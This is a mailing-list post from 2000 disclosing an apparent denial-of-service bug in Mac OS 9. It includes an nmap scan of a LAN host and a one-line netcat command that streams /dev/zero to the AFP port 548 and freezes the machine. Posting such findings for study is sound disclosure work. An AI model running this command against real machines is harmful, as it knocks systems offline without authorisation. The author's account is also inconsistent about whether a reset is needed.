Vulnerability Development mailing list archives

Apple Mac DoS

From: The Q <quentyn () HOTMAIL COM>
Date: Wed, 13 Dec 2000 09:54:58 -0000

 I have noticed some unusual behaviour with Mac OS 9
 I am not a Mac user so I apologize if this is a known bug

 I have checked the archives and generally on the Net and can find no
mention of this effect

 any way a bit of background...

 I was nmaping a mac (running os 9) to see if I could diagnose why a smb
connection couldn't be established. Not being familiar with mac os (at all)
I telnetted to the open ports and didn't get a lot.

 erm...

 then decided to try a netcat to each port.... (don't ask why)

 well to cut a long story short it causes a MASSIVE DoS on the mac if you
net cat /dev/zero to port 548 tcp. The Machine needs a reset before it will
respond. Surely this can't be right?

 the details

 - Ports open are

 testhost@testhost ]$ nmap 192.168.1.96     ## IP of a mac boxen

 Starting nmap V. 2.53 by fyodor () insecure org ( www.insecure.org/nmap/ )
 Interesting ports on  (192.168.1.96):
 (The 1521 ports scanned but not shown below are in state: closed)
 Port       State       Service
 427/tcp    open        svrloc
 548/tcp    open        afpovertcp

 Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds

 to cause the DoS

 testhost@testhost ]$./nc -v 192.168.1.96 548 < /dev/zero

 caused massive DoS - mouse nonfunctional (important on a mac :o)

of course when you stop the netcat the mac returns to normal after 10-20
secs